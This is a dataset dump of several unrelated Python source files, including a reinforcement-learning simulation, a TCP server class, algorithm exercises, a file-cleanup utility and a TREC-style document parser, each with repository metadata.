arb.action(sarsa.get_Q_values(human_obs), forward.get_Q_values(human_obs))\r\n #print(\"human action : \", human_action)\r\n\r\n \"\"\"human act on environment\"\"\"\r\n next_human_obs, human_reward, game_terminate, next_control_obs_frag \\\r\n = env.step((MDP.HUMAN_AGENT_INDEX, human_action))\r\n\r\n \"\"\"update human agent\"\"\"\r\n spe = forward.optimize(human_obs, human_reward, human_action, next_human_obs, env)\r\n next_human_action = arb.action(sarsa.get_Q_values(human_obs), forward.get_Q_values(next_human_obs)) # required by models like SARSA\r\n if env.is_flexible == 1: #flexible goal condition\r\n rpe = sarsa.optimize(human_reward, human_action, next_human_action, human_obs, next_human_obs)\r\n else: # specific goal condition human_reward should be normalized to sarsa\r\n if human_reward > 0: # if reward is 10, 20, 40\r\n rpe = sarsa.optimize(40, human_action, next_human_action, human_obs, next_human_obs)\r\n else:\r\n rpe = sarsa.optimize(0, human_action, next_human_action, human_obs, next_human_obs)\r\n\r\n mf_rel, mb_rel, p_mb, d_p_mb = arb.add_pe(rpe, spe)\r\n t_d_p_mb += d_p_mb\r\n t_p_mb += p_mb\r\n t_mf_rel += mf_rel\r\n t_mb_rel += mb_rel\r\n t_rpe += abs(rpe)\r\n t_spe += spe\r\n t_score += human_reward # if not the terminal state, human_reward is 0, so simply add here is fine\r\n\r\n \"\"\"iterators update\"\"\"\r\n human_obs = next_human_obs\r\n if current_game_step == 0:\r\n rpe1 = rpe\r\n else:\r\n rpe2 = rpe\r\n current_game_step += 1\r\n\r\n # calculation after one trial\r\n d_p_mb, p_mb, mf_rel, mb_rel, rpe, spe = list(map(lambda x: x / 2, [\r\n t_d_p_mb, t_p_mb, t_mf_rel, t_mb_rel, t_rpe, t_spe])) # map to average value\r\n cum_d_p_mb += d_p_mb\r\n cum_p_mb += p_mb\r\n cum_mf_rel += mf_rel\r\n cum_mb_rel += mb_rel\r\n cum_rpe += rpe\r\n cum_spe += spe\r\n cum_score += t_score\r\n\r\n \"\"\"update control agent\"\"\"\r\n t_reward = error_to_reward((rpe, spe, mf_rel, mb_rel), p_mb, CONTROL_MODE)\r\n cum_reward += t_reward\r\n #next_control_obs = np.append(next_control_obs_frag, [rpe, spe])\r\n\r\n #control_obs_extra = [rpe, spe]\r\n PMB_shuffle[affected_sbj_indx][episode*TRIALS_PER_EPISODE+trial]=p_mb\r\n RPE_shuffle[affected_sbj_indx][episode*TRIALS_PER_EPISODE+trial]=rpe\r\n SPE_shuffle[affected_sbj_indx][episode * TRIALS_PER_EPISODE + trial] = spe\r\n Reward_shuffle[affected_sbj_indx][episode * TRIALS_PER_EPISODE + trial] = t_reward\r\n Score_shuffle[affected_sbj_indx][episode * TRIALS_PER_EPISODE + trial] = t_score\r\n\r\n\r\n if episode == CONTROL_resting - 1:\r\n arb_save = arb\r\n sarsa_save = sarsa\r\n forward_save = forward\r\n\r\n save_pol_list = ['max-spe','min-spe','max-rpe','min-rpe','min-rpe-min-spe','max-rpe-max-spe','min-rpe-max-spe','max-rpe-min-spe']\r\n save_file_head = 'history_results/SUB{0:03d}_SHUFFLE_'.format(policy_sbj_indx) + save_pol_list[pol_list.index(CONTROL_MODE)]+file_suffix\r\n np.save(save_file_head+'_PMB.npy',PMB_shuffle)\r\n np.save(save_file_head+'_RPE.npy',RPE_shuffle)\r\n np.save(save_file_head + '_SPE.npy', SPE_shuffle)\r\n np.save(save_file_head+'_RWD.npy',Reward_shuffle)\r\n np.save(save_file_head + '_SCR.npy', Score_shuffle)\r\n\r\n\r\nif __name__ == '__main__':\r\n short_opt = \"hdn:\"\r\n long_opt = [\"policy-sbj=\",\"ctrl-mode=\",\"task-type=\",'file-suffix=']\r\n try:\r\n opts, args = getopt.getopt(sys.argv[1:], short_opt, long_opt)\r\n except getopt.GetoptError as err:\r\n print(err)\r\n sys.exit(2)\r\n for o, a in opts:\r\n if o == \"--policy-sbj\":\r\n policy_sbj_indx = int(a)\r\n elif o == \"--ctrl-mode\":\r\n CONTROL_MODE = a\r\n elif o == \"--task-type\":\r\n TASK_TYPE = int(a)\r\n elif o == \"--file-suffix\":\r\n file_suffix = a\r\n print(file_suffix)\r\n elif o == \"--MF_ONLY\":\r\n MF_ONLY = bool(a)\r\n elif o == \"--MB_ONLY\":\r\n MB_ONLY = bool(a)\r\n elif o == \"--file-suffix\":\r\n FILE_SUFFIX = a\r\n else:\r\n assert False, \"unhandled option\"\r\n\r\n shuffle_simulation(CONTROL_MODE = CONTROL_MODE, policy_sbj_indx = policy_sbj_indx)\r\n","sub_path":"shuffle_simulation.py","file_name":"shuffle_simulation.py","file_ext":"py","file_size_in_byte":17133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"561439716","text":"import sys\nsys.stdin=open('danG.txt', 'r')\n\n\ndef dfs(a, b):\n global cnt, num, rocol\n base[a][b] = cnt\n num += 1\n for dir in range(4):\n aa = a+dy[dir]\n bb = b+dx[dir]\n if -1 < aa < rocol and -1 < bb < rocol:\n if base[aa][bb] == 1:\n dfs(aa, bb)\n\n\ndy = [-1, 1, 0, 0]\ndx = [0, 0, -1, 1]\nrocol = int(input())\nbase = [0]*rocol\ncnt = 1\nnum = 0\nnum_list = []\nfor i in range(rocol):\n base[i] = list(map(int, input()))\nfor ii in range(rocol):\n for jj in range(rocol):\n if base[ii][jj] == 1:\n cnt += 1\n dfs(ii, jj)\n num_list.append(num)\n num = 0\nprint(cnt-1)\nnum_list.sort()\nfor nn in range(len(num_list)):\n print(num_list[nn])","sub_path":"algorithm_practice/s2s3_ad_study/dfsbfs/2667_danG.py","file_name":"2667_danG.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"392503240","text":"#!/usr/bin/python3\n\"\"\"task 0\"\"\"\nimport requests\nimport sys\nif __name__ == '__main__':\n if len(sys.argv) == 2 and sys.argv[1].isdigit():\n arg = sys.argv[1]\n res1 = requests.get('https://jsonplaceholder.typicode.com/todos')\n res2 = requests.get('https://jsonplaceholder.typicode.com/users')\n s = res1.json()\n usr = res2.json()\n for y in usr:\n if y['id'] == int(arg):\n user = y['name']\n Max = 0\n Done = 0\n titles = []\n for i in s:\n for key, value in i.items():\n if key == 'userId' and value == int(arg):\n Max += 1\n for key, value in i.items():\n if key == 'completed' and value is True:\n Done += 1\n titles.append(i['title'])\n print('Employee {} is done with tasks({}/{}):'.format(user, Done, Max))\n for i in titles:\n print('\\t {}'.format(i))\n","sub_path":"0x15-api/0-gather_data_from_an_API.py","file_name":"0-gather_data_from_an_API.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"484958553","text":"import time\nimport socket\nimport threading\nimport selectors\nfrom ANETTEST.AutoNET.Socket._Tool import get_my_ip, get_socket_buffer_size\nfrom ANETTEST.AutoNET.Socket._decode import cut_message_by_head, get_data_len, decode_message\nfrom ANETTEST.AutoNET.Socket._decode import LEN_TOTAL, build_tx_message\n\n\nclass TcpServer(object):\n\n def __init__(self, recv_cb, event_cb, error_cb, port, rx_length=256, launch_delay=0):\n # CALLBACK\n self._recv_cb = recv_cb\n self._event_cb = event_cb\n self._error_cb = error_cb\n # TCP\n self._select = None\n self._tcp = None\n self._is_bound = False\n self._port = port\n self._clients = dict() # {socket_conn: '10.10.10.10'}\n self._rx_length = rx_length\n self._rx_buffer = bytes()\n # Thread\n self._thread = threading.Thread(target=self._working)\n self._thread_interval = 2\n self._thread.daemon = True\n self._thread_delay = launch_delay\n self._thread.start()\n\n def _working(self):\n time.sleep(self._thread_delay)\n self._tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1) # SO_REUSEADDR, SO_REUSEPORT\n self._tcp.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, get_socket_buffer_size())\n self._tcp.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, get_socket_buffer_size())\n self._select = selectors.DefaultSelector()\n self._select.register(self._tcp, selectors.EVENT_READ, self._accept)\n while 1:\n if self._is_bound:\n events = self._select.select(timeout=self._thread_interval)\n for key, mask in events:\n callback = key.data\n callback(key.fileobj)\n else:\n host_ip = self.get_my_ip()\n if host_ip:\n try:\n self._tcp.bind((host_ip, self._port))\n self._tcp.listen()\n self._is_bound = True\n except socket.error as err:\n self._error_cb(module='ANET_TCP', code='BIND', value=err)\n time.sleep(self._thread_interval)\n self._event_cb(module='ANET_TCP', code='BIND', value=(self._is_bound, (host_ip, self._port)))\n else:\n print('[ERROR] ANET_SERVER: Network is unreachable')\n\n def _recv_length(self, conn, rx_length):\n rx_msg = bytes()\n try:\n msg = conn.recv(rx_length)\n if msg:\n rx_msg += msg\n else:\n self._client_lost(conn=conn)\n except (BlockingIOError, socket.timeout, OSError) as err:\n print(' BlockingIOError', err)\n except (ConnectionResetError, ConnectionAbortedError) as err:\n print(' ConnectionResetError', err)\n self._client_lost(conn=conn)\n return rx_msg\n\n def _recv(self, conn):\n # RX ONE MESSAGE\n self._rx_buffer += self._recv_length(conn=conn, rx_length=self._rx_length)\n while self._rx_buffer:\n # CUT_TO_HEAD\n msg_with_head = cut_message_by_head(buffer=self._rx_buffer)\n if not msg_with_head:\n break\n # GET_DATA_LEN\n data_len, miss_len = get_data_len(msg_with_head=msg_with_head)\n if miss_len > 0: # MISS_DATA\n new_buffer = self._recv_length(conn=conn, rx_length=miss_len)\n if new_buffer:\n self._rx_buffer += new_buffer\n else:\n break\n else: # PARSE_DATA\n data, self._rx_buffer, error = decode_message(msg_with_head=msg_with_head, data_len=data_len)\n if data:\n self._recv_cb(rx_msg=data, ip=self._clients[conn])\n if error:\n self._error_cb(module='ANET_TCP', code=error, value=self._rx_buffer)\n\n def _conn_send(self, conn, data: bytes):\n bytes_sent = 0\n try:\n msg, msg_len = build_tx_message(data=data)\n bytes_sent = conn.send(msg)\n if bytes_sent != msg_len:\n print('[ERROR], TCP_TX', f'{bytes_sent}/{len(msg)}', msg)\n self._error_cb(module='ANET_TCP', code='TX_BUF_OVERFLOW', value=msg)\n bytes_sent -= LEN_TOTAL\n except (BlockingIOError, socket.timeout, OSError) as err:\n pass\n except (ConnectionResetError, ConnectionAbortedError) as err:\n self._error_cb(module='ANET_TCP', code='SEND', value=err)\n self._client_lost(conn)\n return bytes_sent\n\n # SEND\n def send_to(self, data, ip):\n bytes_sent = 0\n if ip in self._clients.values():\n conn = list(self._clients.keys())[list(self._clients.values()).index(ip)]\n bytes_sent = self._conn_send(conn, data)\n return bytes_sent\n\n def send_broadcast(self, data):\n arrived_clients_ip = list()\n if self._clients:\n for conn in list(self._clients.keys()):\n bytes_sent = self._conn_send(conn, data)\n if bytes_sent:\n arrived_clients_ip.append(self._clients[conn])\n return arrived_clients_ip\n\n # ACCEPT / LOST\n def _accept(self, sock):\n conn, addr = sock.accept()\n ip, port = addr\n self._clients[conn] = ip\n self._select.register(conn, selectors.EVENT_READ, self._recv)\n self._event_cb(module='ANET_TCP', code='CONNECT', value=(True, (ip, self._port)))\n\n def _client_lost(self, conn):\n if conn in self._select.get_map():\n self._select.unregister(conn)\n if conn in self._clients:\n ip = self._clients[conn]\n conn.close()\n self._clients.pop(conn)\n self._event_cb(module='ANET_TCP', code='CONNECT', value=(False, (ip, self._port)))\n\n # FUNC\n def is_bound(self):\n return self.is_bound\n\n def get_client_ips(self):\n return list(self._clients.values())\n\n def is_connected(self):\n return True if list(self._clients.values()) else False\n\n def disconnect_all(self):\n for conn in list(self._clients.keys()):\n self._client_lost(conn=conn)\n\n @staticmethod\n def get_my_ip():\n return get_my_ip()\n\n def get_server_port(self):\n return self._port\n\n def exit(self):\n self._tcp.close()\n\n\nif __name__ == '__main__':\n\n def recv_cb_(rx_msg, ip):\n print(f'TCP_RX: {rx_msg} ({ip})')\n\n def event_cb_(module, code, value):\n print(f'EVENT_RX: {module} {code} {value}')\n\n def error_cb_(module, code, value):\n print(f'ERROR: {module} {code} {value}')\n\n SER_PORT = 10001\n\n server = TcpServer(recv_cb_, event_cb_, error_cb_, port=SER_PORT)\n print('MY_IP=', server.get_my_ip())\n while 1:\n time.sleep(2)\n server.send_broadcast(b'message from server')\n","sub_path":"ANETTEST/AutoNET/Socket/TcpServer.py","file_name":"TcpServer.py","file_ext":"py","file_size_in_byte":7024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"230589731","text":"from threading import Timer, Thread\nfrom functools import partial\nfrom os import remove, path, stat, walk\nfrom platform import system\nfrom time import time\n\n\ndef get_file_creation_date(filepath: str) -> str:\n if system() == \"Windows\":\n return path.getctime(filepath)\n else:\n meta = stat(filepath)\n try:\n return meta.st_birthtime\n except AttributeError:\n return meta.st_mtime\n\n\ndef get_all_files_in_dir(dir: str) -> list:\n filepaths = []\n\n for pack in walk(dir):\n for f in pack[2]:\n filepaths.append(f)\n\n return filepaths\n\n\ndef del_old_files_in_dir(path: str, age: int = 0):\n def _del_old_files_in_dir(path: str, age: int = 0):\n filepaths = get_all_files_in_dir()\n\n for filepath in filepaths:\n crt_time = get_file_creation_date(filepath)\n if time() - crt_time > age:\n Thread(target=remove, args=[filepath]).start()\n\n Thread(target=_del_old_files_in_dir, args=[path, age]).start()\n\n\ndef del_old_files_in_dir_periodic(interval: int, path: str, age: int = 0):\n Timer(interval, partial(del_old_files_in_dir, age, path)).start()\n","sub_path":"wb/utils/cleaner.py","file_name":"cleaner.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"325257381","text":"# 3.6 Установка дополнительных модулей\n\n\"\"\"\nИмеется набор файлов, каждый из которых, кроме последнего, содержит имя следующего файла.\nПервое слово в тексте последнего файла: \"We\".\n\nСкачайте предложенный файл. В нём содержится ссылка на первый файл из этого набора.\n\nВсе файлы располагаются в каталоге по адресу:\nhttps://stepic.org/media/attachments/course67/3.6.3/\n\nЗагрузите содержимое последнего файла из набора, как ответ на это задание.\n\"\"\"\n\nimport requests\n\nurl = 'https://stepic.org/media/attachments/course67/3.6.3/699991.txt'\nwhile True:\n r = requests.get(url)\n t = r.text.split()\n if t[0] == 'We':\n with open('D:\\Python\\dataset_3378_result.txt', 'w', encoding='utf-8') as inf:\n inf.write(r.text)\n break\n else:\n url = 'https://stepic.org/media/attachments/course67/3.6.3/' + r.text","sub_path":"3/3.6.3.py","file_name":"3.6.3.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"78596048","text":"'''\n\n'''\n\nclass ListNode(object):\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\ndef mergeTwoLists_iteratively(l1,l2):\n dummy = cur = ListNode(0)\n while l1 and l2:\n if l1.val < l2.val:\n cur.next = l1\n l1=l1.next\n else:\n cur.next = l2\n l2=l2.next\n cur = cur.next\n cur.next = l1 or l2\n return dummy.next\n\ndef mergeTwoLists_recursively(l1, l2):\n if not l1 or not l2:\n return l1 or l2\n if l1.val< l2.val:\n print(l1.val,\" is less than \",l2.val)\n l1.next = mergeTwoLists_recursively(l1.next,l2)\n print(\"Move \",l1.val,\" to smaller between \",l1.next.val,l2.val)\n return l1\n else:\n print(l2.val,\" is less than \",l1.val)\n l2.next = mergeTwoLists_recursively(l1,l2.next)\n print(\"Move \",l2.val,\" to smaller between \",l1.val,l2.next.val)\n return l2\n\nl1 = ListNode(3,ListNode(5,ListNode(6)))\nl2 = ListNode(1,ListNode(2, ListNode(4, ListNode(7))))\nh = mergeTwoLists_iteratively(l1,l2)\nwhile h:\n print(h.val)\n h = h.next","sub_path":"GoogleTopQues/21_mergeTwoLists.py","file_name":"21_mergeTwoLists.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"454604217","text":"class Edge:\n \"\"\"\n An edge which records two centers and two adjacent corners\n \"\"\"\n def __init__(self, id, center1, center2, vertex1, vertex2, is_border):\n self.id = id\n self.d0 = center1\n self.d1 = center2\n self.v0 = vertex1\n self.v1 = vertex2\n self.is_border = is_border\n","sub_path":"cartograph/border_graph/Edge.py","file_name":"Edge.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"83948217","text":"#! /usr/bin/env python3\n\nimport functions # this imports all functions in the file functions\n\t\t\t\t # you can import this as another name if the name of the module is large or too long.\n\t\t\t\t # e.g import functions as f\n\nfrom functions_2 import preety_Print # This imports the preety_Print function only\n\t\t\t\t\t\t\t\t\t # You can also import function as\n\t\t\t\t\t\t\t\t\t # e.g from functions_2 import preety_print as p_p\n\t\t\t\t\t\t\t\t\t # you can import all functions with *\n\t\t\t\t\t\t\t\t\t # e.g from functions_2 import *\n\n\nthree_hundred = functions.add(1, 299)\nprint(three_hundred)\n\nd = {\n\t'first_name' : 'Eric',\n\t'last_name' : 'Mwamodo',\n\t'age' : 23,\n\t'location' : 'Wundanyi'\n}\n\npreety_Print(d)\n","sub_path":"Basics/10-07-2016/imports__.py","file_name":"imports__.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"446597119","text":"from flask import make_response, request, session\nfrom datetime import date, datetime, timedelta\nfrom .db import db\nimport time\nimport random\nimport string\n\nclass security :\n def __init__(self):\n self.table = 'security'\n self.valid_duration = 60 * 10\n\n def get_hash(self) :\n obj_database = db()\n security_hash = self.hash_generator()\n query = ('INSERT INTO ' + self.table + ' (security_hash, security_time, security_used) VALUES (%s, %s, %s)')\n data = (security_hash, time.strftime('%Y-%m-%d %H:%M:%S'), 0)\n\n if obj_database.insert(query, data) != False :\n return security_hash\n else :\n return False\n\n def check_hash(self, hash='') :\n obj_database = db()\n query = ('SELECT * FROM ' + self.table + ' WHERE security_hash=%s AND security_used!=%s')\n data = (hash, 1, )\n security_records = obj_database.select(query, data)\n\n if len(security_records) > 0 :\n if int(datetime.now().timestamp()) - int(datetime.timestamp(security_records[0]['security_time'])) < self.valid_duration :\n query = ('UPDATE ' + self.table + ' SET security_used=%s WHERE security_hash=%s')\n data = (1, hash)\n obj_database.update(query, data)\n\n return True\n else :\n return False\n else :\n return False\n\n def hash_generator(self) :\n letters = string.ascii_lowercase + '1234567890'\n return ''.join(random.choice(letters) for i in range(32))\n","sub_path":"src/pm_server/modules/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"355093434","text":"import os.path\nimport datetime\nimport re\nimport gzip\n\ndocNoKey = \"DOCNO\"\ndateTimeKey = \"DATE_TIME\"\ndocTypeKey = \"DOCTYPE\"\nheaderKey = \"HEADER\"\nslugKey = \"SLUG\"\ntrailerKey = \"TRAILER\"\nheadlineKey = \"HEADLINE\"\npKey = \"P\"\nbodyKey = \"BODY\"\ntextKey = \"TEXT\"\ndocKey = \"DOC\"\n\n\nclass Document:\n\tdef __init__(self):\n\t\t\"\"\"\n\t\t\tInitialize the document\n\t\t\"\"\"\n\t\tself.docNo = \"\"\n\t\tself.dateTime = \"\"\n\t\tself.header = \"\"\n\t\tself.docType = \"\"\n\t\tself.slug = \"\"\n\t\tself.headline = \"\"\n\t\tself.trailer = \"\"\n\t\tself.body = \"\"\n\t\tself.comparableDateTime = None\n\t\tself.paragraphs = []\n\n\tdef __str__(self):\n\t\t\"\"\"\n\t\t\tsimple tostring method, used for the developer to see what the object looks like (need to cleanse single quotes)\n\t\t\"\"\"\n\n\t\tparagraphText = \"\"\n\t\tfor paragraph in self.paragraphs:\n\t\t\tparagraphText += paragraph\n\n\t\treturn \"\"\"\n\t\t{\n\t\t\tdocNo: '%s',\n\t\t\tdateTime: '%s',\n\t\t\theader: '%s',\n\t\t\tslug: '%s',\n\t\t\theadline: '%s',\n\t\t\ttrailer: '%s',\n\t\t\tbody: '%s',\n\t\t\tparagraphs: '%s'\n\t\t}\n\t\t\"\"\" % (self.docNo, self.dateTime, self.header, self.slug, self.headline, self.trailer, self.body, paragraphText)\n\n\tdef getComparableDate(self):\n\t\tbeginningOfTime = datetime.datetime(1970, 1, 1)\n\n\t\ttry:\n\t\t\tbeginningOfTime = datetime.datetime.strptime(re.sub(\"\\\\s+\", \"\", self.dateTime)[0:10], \"%Y-%m-%d\")\n\t\texcept:\n\t\t\tpass\n\n\t\treturn beginningOfTime\n\n\t@staticmethod\n\tdef cleanseParagraph(paragraph):\n\t\tbeginningArticles = [\"--\", \"_\"]\n\t\taltParagraph = paragraph\n\n\t\tfor beginningArticle in beginningArticles:\n\t\t\tresult = altParagraph.find(beginningArticle, 0)\n\n\t\t\tif result > -1:\n\t\t\t\tsubStr = altParagraph[0:result]\n\t\t\t\tuppers = [l for l in subStr if l.isupper()]\n\n\t\t\t\tif float(len(uppers)) > float(len(subStr) / 2):\n\t\t\t\t\taltParagraph = altParagraph[result+len(beginningArticle):]\n\t\t\t\t\tbreak\n\n\t\treturn altParagraph\n\n\t@staticmethod\n\tdef build(objectDictionary):\n\t\t\"\"\"\n\t\t\tbuild the document object given a dictionary with string keys and array of strings values: { 'key', [ 'first', 'second' ]}\n\t\t\"\"\"\n\n\t\tnewDocument = Document()\n\n\t\tif docNoKey in objectDictionary:\n\t\t\tfor item in objectDictionary[docNoKey]:\n\t\t\t\tnewDocument.docNo += unicode(item, errors='replace')\n\n\t\tif docTypeKey in objectDictionary:\n\t\t\tfor item in objectDictionary[docTypeKey]:\n\t\t\t\tnewDocument.docType += unicode(item, errors='replace')\n\n\t\tif dateTimeKey in objectDictionary:\n\t\t\tfor item in objectDictionary[dateTimeKey]:\n\t\t\t\tnewDocument.dateTime += unicode(item, errors='replace')\n\n\t\tif headerKey in objectDictionary:\n\t\t\tfor item in objectDictionary[headerKey]:\n\t\t\t\tnewDocument.header += unicode(item, errors='replace')\n\n\t\tif slugKey in objectDictionary:\n\t\t\tfor item in objectDictionary[slugKey]:\n\t\t\t\tnewDocument.slug += unicode(item, errors='replace')\n\n\t\tif headlineKey in objectDictionary:\n\t\t\tfor item in objectDictionary[headlineKey]:\n\t\t\t\tnewDocument.headline += unicode(item, errors='replace')\n\n\t\tif trailerKey in objectDictionary:\n\t\t\tfor item in objectDictionary[trailerKey]:\n\t\t\t\tnewDocument.trailer += unicode(item, errors='replace')\n\n\t\tif pKey in objectDictionary:\n\t\t\tfor item in objectDictionary[pKey]:\n\t\t\t\tnewDocument.paragraphs.append(unicode(item, errors='replace'))\n\t\telif textKey in objectDictionary:\n\t\t\tfor item in objectDictionary[textKey]:\n\t\t\t\tnewDocument.paragraphs.append(Document.cleanseParagraph(unicode(item, errors='replace')))\n\n\t\tif bodyKey in objectDictionary:\n\t\t\tfor item in objectDictionary[bodyKey]:\n\t\t\t\tnewDocument.body += unicode(item, errors='replace')\n\n\t\treturn newDocument\n\n\t@staticmethod\n\tdef returnCharsFromDocument(filePath, seekToId):\n\t\t\"\"\"\n\t\t\treturn the characters from a document\n\t\t\"\"\"\n\t\tif filePath[-3:] == \".gz\":\n\t\t\tdocFile = gzip.open(filePath)\n\t\telse:\n\t\t\tdocFile = open(filePath, 'r')\n\n\t\tif seekToId is not None:\n\t\t\tpos = 0\n\t\t\tprevpos = 0\n\t\t\tline = \"\"\n\t\t\twhile seekToId not in line:\n\t\t\t\tprevpos = pos\n\t\t\t\tpos = docFile.tell()\n\t\t\t\tline = docFile.readline()\n\n\t\t\tif seekToId in line:\n\t\t\t\tif docNoKey in line:\n\t\t\t\t\toffset = prevpos - docFile.tell()\n\t\t\t\telse:\n\t\t\t\t\toffset = pos - docFile.tell()\n\t\t\t\tdocFile.seek(offset, 1)\n\t\t\telse:\n\t\t\t\traise IOError(\"Could not find topic \" + seekToId + \" in file \" + filePath)\n\n\t\twhile True:\n\t\t\tc = docFile.read(1)\n\n\t\t\tif not c:\n\t\t\t\treturn\n\n\t\t\tyield c\n\n\t@staticmethod\n\tdef returnCharsFromString(largeString):\n\t\t\"\"\"\n\t\t\treturn the characters from a string\n\t\t\"\"\"\n\t\tfor char in largeString:\n\t\t\tyield char\n\n\t@staticmethod\n\tdef factoryFromIndexer(documentIndexer):\n\t\tif documentIndexer == None:\n\t\t\treturn None\n\n\t\tindex = 0\n\t\tactualString = \"\"\n\t\tfor char in Document.returnCharsFromDocument(documentIndexer.fileName):\n\t\t\tif index >= documentIndexer.start and index <= documentIndexer.end:\n\t\t\t\tactualString += char\n\t\t\telif index > documentIndexer.end:\n\t\t\t\treturn Document.factory(actualString)\n\n\t\t\tindex += 1\n\n\t@staticmethod\n\tdef factoryForSpecificDocNo(inputFileName, docNo):\n\t\t\"\"\"\n\t\t\tbuild 1 document given an input and doc number\n\t\t\"\"\"\n\n\t\tcharMethod = Document.returnCharsFromDocument\n\n\t\ttagStack = []\n\t\tcurrentTag = \"\"\n\t\tcurrentObject = {}\n\n\t\tseenOpeningTag = False\n\t\tseenClosingTag = False\n\t\tseenClosingXml = False\n\t\tworkspace = \"\"\n\n\t\tfoundDocNo = False\n\n\t\tfor c in charMethod(inputFileName, docNo):\n\t\t\t# print c,\n\t\t\tif c == \"<\":\n\t\t\t\tseenOpeningTag = True\n\t\t\t\ttagStackLen = len(tagStack)\n\n\t\t\t\tif tagStackLen > 0:\n\t\t\t\t\tlastTag = tagStack[tagStackLen - 1]\n\t\t\t\t\t# check if we found the docno\n\t\t\t\t\tif lastTag == docNoKey and workspace.strip() == docNo:\n\t\t\t\t\t\tfoundDocNo = True\n\n\t\t\t\t\tif lastTag in currentObject and foundDocNo:\n\t\t\t\t\t\tcurrentObject[lastTag].append(workspace)\n\t\t\t\t\telif foundDocNo:\n\t\t\t\t\t\tcurrentObject[lastTag] = [workspace]\n\n\t\t\t\tcurrentTag = \"\"\n\t\t\t\tworkspace = \"\"\n\t\t\telif c == \"/\" and seenOpeningTag:\n\t\t\t\tseenClosingXml = True\n\t\t\telif c == \">\" and seenOpeningTag:\n\t\t\t\t# remove the last one\n\t\t\t\tif seenClosingXml and len(tagStack) > 0:\n\t\t\t\t\ttagStack.pop()\n\t\t\t\telse:\n\t\t\t\t\tif currentTag[:4] == \"DOC \" and docNo in currentTag:\n\t\t\t\t\t\tfoundDocNo = True\n\t\t\t\t\t\ttagStack.append(\"DOC\")\n\t\t\t\t\t\tcurrentObject[docNoKey] = [docNo]\n\t\t\t\t\telse:\n\t\t\t\t\t\ttagStack.append(currentTag)\n\n\t\t\t\tseenOpeningTag = False\n\t\t\t\tseenClosingXml = False\n\t\t\t\tseenClosingTag = False\n\t\t\t\tworkspace = \"\"\n\n\t\t\t\tendedXmlDoc = len(tagStack) == 0\n\t\t\t\tif endedXmlDoc and foundDocNo:\n\t\t\t\t\treturn Document.build(currentObject)\n\t\t\t\telif endedXmlDoc:\n\t\t\t\t\tcurrentObject = {}\n\t\t\telif seenOpeningTag:\n\t\t\t\tcurrentTag += c\n\t\t\telse:\n\t\t\t\tworkspace += c\n\t\treturn None\n\n\t@staticmethod\n\tdef factory(input, isFile=False):\n\t\t\"\"\"\n\t\t\tbuild a single document given an input\n\t\t\"\"\"\n\t\tresult = list(Document.factoryMultiple(input, isFile))\n\n\t\tif len(result) > 0:\n\t\t\treturn result[0]\n\t\treturn None\n\n\t@staticmethod\n\tdef factoryMultiple(input, isFile=False, isSingle=True):\n\t\t\"\"\"\n\t\t\tbuild multiple documents given an input\n\t\t\"\"\"\n\n\t\tcharMethod = Document.returnCharsFromString\n\n\t\tif isFile:\n\t\t\tcharMethod = Document.returnCharsFromDocument\n\n\t\ttagStack = []\n\t\tcurrentTag = \"\"\n\t\tcurrentObject = {}\n\n\t\tseenOpeningTag = False\n\t\tseenClosingTag = False\n\t\tseenClosingXml = False\n\t\tworkspace = \"\"\n\n\t\tfor c in charMethod(input):\n\t\t\tif c == \"<\":\n\t\t\t\tseenOpeningTag = True\n\n\t\t\t\ttagStackLen = len(tagStack)\n\n\t\t\t\tif tagStackLen > 0:\n\t\t\t\t\tlastTag = tagStack[tagStackLen - 1]\n\t\t\t\t\tif lastTag in currentObject:\n\t\t\t\t\t\tcurrentObject[lastTag].append(workspace)\n\t\t\t\t\telse:\n\t\t\t\t\t\tcurrentObject[lastTag] = [workspace]\n\n\t\t\t\tcurrentTag = \"\"\n\t\t\t\tworkspace = \"\"\n\t\t\telif c == \"/\" and seenOpeningTag:\n\t\t\t\tseenClosingXml = True\n\t\t\telif c == \">\" and seenOpeningTag:\n\t\t\t\t# remove the last one\n\t\t\t\tif seenClosingXml and len(tagStack) > 0:\n\t\t\t\t\ttagStack.pop()\n\t\t\t\telse:\n\t\t\t\t\ttagStack.append(currentTag)\n\n\t\t\t\tseenOpeningTag = False\n\t\t\t\tseenClosingXml = False\n\t\t\t\tseenClosingTag = False\n\t\t\t\tworkspace = \"\"\n\n\t\t\t\tif len(tagStack) == 0:\n\t\t\t\t\tyield Document.build(currentObject)\n\n\t\t\t\t\t# don't want to compute more than we have to...\n\t\t\t\t\tif isSingle:\n\t\t\t\t\t\tbreak\n\n\t\t\t\t\tcurrentObject = {}\n\n\t\t\telif seenOpeningTag:\n\t\t\t\tcurrentTag += c\n\t\t\telse:\n\t\t\t\tworkspace += c","sub_path":"src/extract/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":7846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
